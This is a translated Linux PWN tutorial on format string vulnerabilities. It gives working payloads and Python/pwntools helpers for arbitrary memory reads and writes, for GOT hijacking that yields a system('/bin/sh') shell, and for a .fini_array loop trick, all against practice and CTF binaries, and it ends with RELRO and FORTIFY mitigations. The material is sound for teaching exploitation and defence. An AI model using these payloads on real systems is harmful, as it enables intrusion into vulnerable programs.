Linux PWN Getting Started Tutorial: Format String Vulnerabilities

Source: Internet
Author: User

Originally from: https://bbs.ichunqiu.com/thread-42943-1-1.html

0x00 The vulnerability in the printf functions

The printf family is a commonly used group of functions in C programming. In general, we call them in the form printf([format string], arguments), such as printf("%s", "Hello World").

However, for the sake of convenience, the call is sometimes written with only a string variable as the argument, with no format string in front of it.

In fact, this is a very dangerous way to write it. Because of a design flaw in the printf family, an attacker who controls the first parameter gets the opportunity to read and write arbitrary memory addresses.

0x01 Using a format string vulnerability for arbitrary address reads

First, let's look at a simple example we wrote ourselves: ~/format_x86/format_x86

This is a very simple program. To leave a backdoor, I wrote a showversion() function that calls system. The rest is an infinite loop that reads input and echoes it back, calling printf() in the problematic way. Normally, whatever we enter is output as is.

But when we enter some specific characters, the output changes.

As you can see, when we enter a format string that printf recognizes, printf parses it and produces output accordingly. The principle is simple: in a call like printf("%s", "Hello World"), the first parameter "%s" is parsed as the format string. Here we pass a variable directly to printf, so when the variable's content is itself a format string, it is naturally parsed by printf. So what is the data that gets output? Let's continue the experiment.

We set a breakpoint directly on the call _printf line, start the program in debug mode, and then enter a long string of %x. The output is:

The stack at this moment:

It's easy to see that the output is just the series of data starting at esp+4 (the slot right after the format string pointer) and going down the stack. So in theory we can read stack data within a limited range by stacking up %x. Can we also leak other data? We know that format strings have %s for outputting strings. It essentially reads the corresponding parameter, interprets it as a pointer, and outputs the string at that address. Let's first enter a single %s and observe the result.

We see that the output is %s followed by a newline. The corresponding stack and data are as follows:

The top of the stack is the first parameter, which points to the %s we entered. The second parameter holds the same address as the first, so %s is resolved against that address and prints our own input: %s and the newline 0x0a. Since we can control stack contents through our input, we can enter an address and make %s correspond to it, so that the string at that address is output. This gives us an arbitrary address read.

From the debugging just now we can see that our input starts at the sixth parameter (the sixth dword from the top of the stack, '000a7325', is %s\n\x00). So we can construct the string "\x01\x80\x04\x08%x.%x.%x.%x.%s". The address at the front is the ELF load address 0x08048000 plus 1. As for why we do not use 0x08048000 itself, interested readers can experiment on their own; the reason comes up again later.

Since the string contains non-printable characters, we cannot type it in directly. This time we debug by running the program through pwntools and attaching IDA.
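The reading of '000a7325' as our input can be checked with a few lines of Python. This is only an illustrative sketch using the standard struct module; the helper name dword_to_bytes is made up for this example.

```python
import struct

def dword_to_bytes(value: int) -> bytes:
    """Return the 4 bytes of a 32-bit stack slot in memory order (little-endian)."""
    return struct.pack("<I", value)

# The sixth dword seen in the debugger, as quoted in the text.
slot = 0x000A7325
print(dword_to_bytes(slot))  # b'%s\n\x00'
```

The lowest byte 0x25 is '%', followed by 0x73 ('s'), 0x0a (newline) and the terminating 0x00, which is exactly the input "%s" plus the newline.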

We succeeded in leaking out the contents of the address 0x08048001.

After the test above, the payload we use to leak an address of our choice should be understandable to the reader. Since our input itself happens to sit at the sixth parameter of printf, we place the address at the very beginning so that printf uses it as the sixth parameter. Next comes the format string: %x consumes the second to fifth parameters (the first parameter is the address of our input, i.e. the format string), and %s interprets the sixth parameter as an address. But what if the input length is limited and our input sits dozens of parameters away? Stacking up %x is obviously impractical. So we need another feature of format strings.

A format string can use a special notation to specify which parameter to process. For example, outputting the fifth parameter can be written as %4$s, the sixth as %5$s, and the nth as %(n-1)$[format specifier]. So our payload can be simplified to "\x01\x80\x04\x08%5$s".
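As a small sketch of the two payload shapes discussed here, the following Python builds the leak payload with the positional form. The function name leak_payload and the NUL-byte check are additions for illustration, not part of the original script.

```python
import struct

def leak_payload(addr: int, index: int) -> bytes:
    """Build '<addr>%<index>$s' for a 32-bit target.

    addr  : address whose string content should be leaked
    index : positional index at which printf finds our input (5 in the text)
    """
    packed = struct.pack("<I", addr)  # little-endian, as on x86
    if b"\x00" in packed:
        # printf stops parsing at the first NUL, so the %s would never be reached
        raise ValueError("address contains a NUL byte")
    return packed + f"%{index}$s".encode()

print(leak_payload(0x08048001, 5))  # b'\x01\x80\x04\x08%5$s'
```

The result is the same byte string as the simplified payload in the text. With pwntools installed, p32(addr) could be used in place of struct.pack.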

0x02 Using a format string vulnerability for arbitrary address writes

Although we can use the format string vulnerability to read arbitrary addresses, reading alone does not let us exploit the program to get a shell; we need to write to arbitrary addresses. So in this section we introduce another feature of format strings: writing with printf.

printf has a special format specifier, %n. Unlike the other specifiers, which control output format and content, %n writes the number of characters output so far into the memory pointed to by the corresponding parameter. We change the payload to "\x8c\x97\x04\x08%5$n", where 0x0804978c is the start address of the .bss section, a writable address. Before execution, the content at this address is 0

After printf executes, the content at this address becomes 4. Looking at the output, we find that four characters, "\x8c\x97\x04\x08", were output; the newline is not counted.

We modify the payload again to "\x8c\x97\x04\x08%2048c%5$n" and successfully change the content at 0x0804978c to 0x804

Now that we have verified reading and writing arbitrary addresses, we can construct an exploit to get a shell.

Since we can write to any address and the program contains the system function, we can simply hijack some function's GOT entry to point to the PLT entry of system, and thereby execute system("/bin/sh"). Which one should we hijack? There are only four functions in the GOT, and printf can be called with a single parameter, which is exactly our input. So we hijack printf to system and then send "/bin/sh" through read, so that printf("/bin/sh") becomes system("/bin/sh"). Based on the arbitrary write experiment above, we can easily construct the payload as follows:
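The two values observed in these experiments (4 and 0x804) follow from simple counting. The sketch below models only that counting, under the simplifying assumption that the prefix is printed literally and that %<width>c prints exactly width characters; the function name is made up for this example.

```python
def chars_written_before_n(prefix: bytes, pad_width: int = 0) -> int:
    """Model the counter that %n stores: bytes printed before %n is reached.

    prefix    : literal bytes at the start of the format string (the address)
    pad_width : width of an optional %<width>c placed before %n (0 = none)
    """
    return len(prefix) + pad_width

addr = b"\x8c\x97\x04\x08"
print(chars_written_before_n(addr))             # 4
print(hex(chars_written_before_n(addr, 2048)))  # 0x804
```

Four address bytes alone give 4, and adding %2048c gives 4 + 2048 = 2052 = 0x804, matching what the debugger shows.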

from pwn import p32

printf_got = 0x08049778

system_plt = 0x08048320

# p32(printf_got) already accounts for 4 output bytes, so subtract 4 from system_plt
payload = p32(printf_got) + b"%" + str(system_plt - 4).encode() + b"c%5$n"

After sending the payload, you can see that the printf entry in the GOT has been hijacked

Send "/bin/sh" again at this point to get a shell.

However, there is a problem here. Readers who actually debug this themselves will find that the call _printf line takes an extremely long time to execute, and that at the final io.interactive() the cursor blinks for a long time while a huge number of blank characters are output. Reading these characters with io.recvall() shows that the amount of data reaches 128.28 MB. This is because our payload makes printf output as many as 134,513,436 padding characters

All of our experiments run between the local machine or virtual machine and Docker, so they are not affected by network conditions. In a real competition or exploitation environment, transferring such a large amount of data at once may cause the connection to stall or even drop. Therefore, we must change the way the exploit is written.

We know that on 64-bit there are %lld and %llx for data of quadword (qword) length. Symmetrically, we can use forms such as %hd and %hhx for word and byte length data, and the corresponding forms of %n are %hn and %hhn. To keep the program from crashing on a half-written address, we still need to rewrite the printf entry in the GOT in one go, so we use %hhn to modify all four bytes within a single payload. We therefore have to reconstruct the payload.

First, we put the addresses of the four bytes to modify into the payload.
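The figures in this paragraph can be reproduced from the two addresses given earlier. This is plain arithmetic in Python; the variable names are chosen for this sketch.

```python
system_plt = 0x08048320   # value that must end up in printf's GOT entry
ADDRESS_BYTES = 4         # p32(printf_got) printed at the start of the payload

pad = system_plt - ADDRESS_BYTES   # width used in the %<pad>c specifier
total = ADDRESS_BYTES + pad        # characters printf outputs before %5$n
mib = total / (1024 * 1024)

print(pad)            # 134513436
print(total)          # 134513440
print(round(mib, 2))  # 128.28
```

So a single %n write of the full 32-bit value forces roughly 128 MB of output, which is why the byte-by-byte approach is preferable.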

Then we modify the first byte. Since both x86 and x86-64 are little-endian, the byte at printf_got holds the last two hex digits of the target value, 0x20

At this point we have changed the data at 0x08049778 to 0x20. Next we need to change the data at 0x08049778+1 to 0x83. Since we have already output 0x20 bytes (16 bytes of addresses plus 0x20-16 characters from %c), we need to output another 0x83-0x20 bytes

We continue with 0x08049778+2, which needs to become 0x04. However, we have already output 0x83 bytes, so we output up to 0x04+0x100=0x104 bytes, which is truncated to 0x04

Modify 0x08049778+3

The final payload is:

'\x78\x97\x04\x08\x79\x97\x04\x08\x7a\x97\x04\x08\x7b\x97\x04\x08%16c%5$hhn%99c%6$hhn%129c%7$hhn%4c%8$hhn'
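The padding values 16, 99, 129 and 4 in the final payload above can be derived mechanically. The following is a minimal sketch of that calculation in plain Python (the function name hhn_payload is made up; it assumes a 32-bit little-endian target and that the four addresses sit at consecutive positional indexes starting at first_index).

```python
import struct

def hhn_payload(target: int, value: int, first_index: int) -> bytes:
    """Write the 4 bytes of `value` to `target` one byte at a time with %hhn."""
    # Four consecutive byte addresses placed at the start of the payload.
    addrs = b"".join(struct.pack("<I", target + i) for i in range(4))
    written = len(addrs)          # 16 characters are already printed
    fmt = b""
    for i, byte in enumerate(struct.pack("<I", value)):  # lowest byte first
        # %hhn keeps only the low 8 bits of the counter, so pad modulo 256.
        pad = (byte - written) % 256
        if pad:
            fmt += f"%{pad}c".encode()
            written += pad
        fmt += f"%{first_index + i}$hhn".encode()
    return addrs + fmt

print(hhn_payload(0x08049778, 0x08048320, 5))
```

For printf_got = 0x08049778 and system_plt = 0x08048320 this yields the same specifier sequence, %16c%5$hhn%99c%6$hhn%129c%7$hhn%4c%8$hhn, and the total output shrinks from about 128 MB to 264 characters.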

Of course, for format string payloads pwntools also provides a ready-made module, fmtstr; see http://docs.pwntools.com/en/stable/fmtstr.html for the documentation. The function we use most often is fmtstr_payload(offset, writes, numbwritten=0, write_size='byte'). The first parameter, offset, is the offset of the first controllable stack slot (not counting the format string argument itself); in our example that is the sixth parameter, so the value is 5. The second parameter is a dictionary whose meaning is clear from its name: it maps each address to the value to write there. numbwritten is the number of characters printf has already output before our format string. For example, with printf("Hello [var]"), "Hello " has already been output before the controllable variable, six characters in total, so the value should be set to 6. The fourth parameter chooses between %hhn (byte), %hn (word) and %n (dword). In our case, the call takes offset 5 and a dictionary that maps printf_got to system_plt.

The script that gets a shell for this example is in the attachment and is not repeated here.

0x03 Format string vulnerabilities on 64-bit

Having finished with format string exploitation on 32-bit, we move on to 64-bit programs, which are now mainstream. We open the example ~/format_x86-64/format_x86-64.

In fact, this program is built from the same source file as the example in the previous section, just compiled as 64-bit. As in the previous example, we first look at the offset of the controllable stack address.

Following the previous example, our input is at the top of the stack, so it would seem to be the first parameter and the offset should be 0. But wait, shouldn't the top of the stack hold the address of the string? Don't forget that on 64-bit the argument order is RDI, RSI, RDX, RCX, R8, R9, and then the stack, so the offset should be 6. We can use a run of %llx to prove it.
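To make the offset of 6 concrete, the sketch below maps a positional index in the format string to where printf fetches that argument under the System V AMD64 calling convention. It covers integer arguments only, and the [rsp+N] notation refers to the stack pointer at the call instruction; the function name is made up for this example.

```python
# RDI holds the format string itself, so variadic arguments start at RSI.
ARG_REGISTERS = ["rsi", "rdx", "rcx", "r8", "r9"]

def arg_location(index: int) -> str:
    """Where printf reads argument number `index` (as in %<index>$llx)."""
    if index < 1:
        raise ValueError("positional indexes start at 1")
    if index <= len(ARG_REGISTERS):
        return ARG_REGISTERS[index - 1]
    # Remaining arguments are 8-byte stack slots, starting at the stack top.
    return f"[rsp+{8 * (index - len(ARG_REGISTERS) - 1)}]"

for i in range(1, 9):
    print(i, arg_location(i))
```

Indexes 1 to 5 come from registers, and index 6 is the first stack slot, which is where our input begins in this program.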

With the offset known, and with printf's GOT entry and system's PLT entry available directly from the program, we can use fmtstr_payload to generate the payload.

However, we will find that this payload fails to change printf's GOT entry to system's PLT entry

Yet looking at memory, the payload itself appears to be fine

So what's the problem? Let's take a look at the output of printf

You can see that after we sent the payload the first time, only three characters were output: a space (\x20), \x10 and ` (\x60). Why is that?

Looking back at the payload, it is easy to see that the three characters \x20\x10\x60 are followed by \x00, and \x00 is the string terminator. This is also why we chose 0x08048001 instead of 0x08048000 for the read test in the earlier section. Since the high bytes of user-space memory addresses on 64-bit are all \x00 (a 64-bit address has 16 hexadecimal digits in total), the previous way of constructing the payload is clearly not feasible. We need to adjust the payload and move the addresses to the end.

Because the addresses contain \x00, they can no longer come before the %hhn specifiers, so our payload is structured as follows

The payload seems to be fine, but if you test it you will see that the program crashes right after io.recvall() reads the output.
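The truncation is easy to reproduce offline. In this sketch the address 0x601020 is inferred from the three output bytes \x20\x10\x60, the trailing %6$hhn is only a placeholder specifier, and c_string_view is a made-up helper that mimics how a C string function sees the buffer.

```python
import struct

def c_string_view(payload: bytes) -> bytes:
    """Return the part of `payload` that printf treats as the format string."""
    return payload.split(b"\x00", 1)[0]

# Address first, format specifiers after it: the 32-bit layout reused on 64-bit.
payload = struct.pack("<Q", 0x601020) + b"%6$hhn"

print(payload)                 # b' \x10`\x00\x00\x00\x00\x00%6$hhn'
print(c_string_view(payload))  # b' \x10`'
```

Everything after the first \x00, including every format specifier, is never parsed, so nothing is written to the GOT.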

Why is that? If you look closely at the stack in the bottom right corner, you will find that the constructed addresses are misaligned.

So we also need to adjust the payload so that the data in front of the addresses is exactly a multiple of the address length. Of course, the address offsets have to be adjusted as well. The result of the adjustment is as follows:

This time everything works.
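One way to sketch this adjustment in plain Python is shown below. It is not the script from the attachment: payload64 and build_specs are made-up names, the target 0x601020 is inferred from the earlier output, and the value 0x400460 is a purely hypothetical stand-in for system's PLT address. The format part is padded to a multiple of 8 bytes, and the positional indexes are recomputed until they agree with the padded length.

```python
import struct

def build_specs(value_bytes: bytes, first_index: int) -> bytes:
    """%<pad>c / %<k>$hhn pairs that write value_bytes one byte at a time."""
    out, written = b"", 0
    for i, byte in enumerate(value_bytes):
        pad = (byte - written) % 256   # %hhn stores the counter modulo 256
        if pad:
            out += f"%{pad}c".encode()
            written += pad
        out += f"%{first_index + i}$hhn".encode()
    return out

def payload64(target: int, value: int, stack_offset: int = 6) -> bytes:
    value_bytes = struct.pack("<Q", value)
    index = stack_offset
    for _ in range(10):                        # iterate until the index is stable
        specs = build_specs(value_bytes, index)
        specs += b"A" * (-len(specs) % 8)      # align addresses to 8 bytes
        new_index = stack_offset + len(specs) // 8
        if new_index == index:
            break
        index = new_index
    else:
        raise RuntimeError("positional index did not converge")
    addrs = b"".join(struct.pack("<Q", target + i) for i in range(8))
    return specs + addrs                       # NUL-containing addresses go last

p = payload64(0x601020, 0x400460)   # hypothetical GOT and PLT addresses
print(len(p), p[:80])
```

The filler bytes come after every %hhn, so they do not affect the values written, and the first \x00 that printf meets lies inside the first address, after all specifiers have been processed.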

0x04 Using a format string vulnerability to make a program loop

From the two examples above, we can see that successfully using a format string vulnerability to get a shell often depends on a loop in the program. What if the program has no loop? Previously we used ROP to hijack the function return address back to start; this time we will use the format string vulnerability to do it.

We open the example ~/mma CTF 2nd 2016-greeting/greeting

Similarly, the GOT of this 32-bit program contains system (see left), and there is a format string vulnerability. The detailed steps of calculating the offset and constructing the payload are not repeated here. The main problem with this program is that we need printf to trigger the vulnerability, but the code shows that no other GOT function is called after printf executes, which means that even if we trigger the vulnerability and hijack the GOT, system will not be executed. So we need to find a way to make the program run through once more.

As mentioned in a previous article, although we use main as the entry point when writing code, the entry point of the compiled program is not main but the start code. The start code in turn calls __libc_start_main to do some initialization, finally calls main, and does some cleanup after main returns. The process is described at http://dbp-consulting.com/tutorials/debugging/linuxProgramStartup.html

Roughly as follows:

Simply put, before main is called, the code in the .init section and every function pointer in the .init_array array are called. Likewise, after main ends, the code in the .fini section and every function pointer in the .fini_array array are called.

Our goal is to change the first element of the .fini_array array to start. Note that the contents of this array are modified again once execution restarts from start, and the number of bytes the program reads is limited, so the two addresses need to be modified in a single pass and the payload adjusted accordingly. The working script is also in the attachment.

0x05 Mitigations related to format string vulnerabilities

When checking programs with the checksec script, we mentioned the role of NX earlier. In this section we describe two other mitigations commonly encountered in Linux PWN that relate to format string vulnerabilities: RELRO and FORTIFY

First, RELRO. RELRO is short for relocation read-only. The relocation tables here are the GOT and PLT in the ELF file that we often refer to. Where these two tables come from and what they do is described in detail in the article on ret2dl-resolve. For now, what we need to know is that these two tables, as the name suggests, exist to relocate functions and variables external to the program (those not defined and implemented in the program itself, such as read; obviously you can call read in your own code without having to write a read function yourself). Because relocation incurs extra performance overhead, programs generally use lazy binding for optimization: the memory address of an external function is looked up on its first call (for read, the first time the program executes call read) and filled into the GOT. Therefore the GOT must be writable. But a writable GOT also gives format string vulnerabilities a very convenient exploitation method, namely modifying the GOT. As mentioned earlier, we can use the vulnerability to change a function's GOT entry (such as puts) to the address of system, so that a call to puts actually invokes system; with the right argument passed along, system("/bin/sh") gets executed. A program that can be attacked this way shows a checksec result such as

Its RELRO item is Partial RELRO.

RELRO: Full RELRO, as shown in the figure at the beginning of this section, means that all of the program's relocation table entries are read-only; neither .got nor .got.plt can be modified. We take such a program (from the exercises of "Stack Canary and bypass thinking"), set a breakpoint at call read, and change the buf argument to a GOT address to try to modify the GOT. The program does not report an error, but the data is not modified, and read returns -1

Clearly, once a program enables Full RELRO, attempts to hijack the GOT through a vulnerability are blocked, and that includes format string vulnerabilities.

Next we introduce another, less common protection, FORTIFY. It is a source-level protection mechanism implemented by GCC that checks the source code at compile time to avoid potential buffer overflows and similar errors. Simply put, with this protection enabled (compiling with the option -D_FORTIFY_SOURCE=2), sensitive functions that can lead to vulnerabilities, such as read, fgets, memcpy and printf, are replaced by __read_chk, __fgets_chk, __memcpy_chk, __printf_chk and so on. These _chk functions check whether the read or copy length exceeds the buffer length, check whether a format string containing specifiers such as %n is located in writable memory that the user might modify, and forbid format strings that skip over parameters, such as a direct %7$x, in order to prevent exploitation. Programs with FORTIFY enabled are reported as such by checksec, and the _chk functions can also be seen when viewing the GOT directly in the disassembly

The after-class exercises can be downloaded from the link: https://bbs.ichunqiu.com/thread-42943-1-1.html
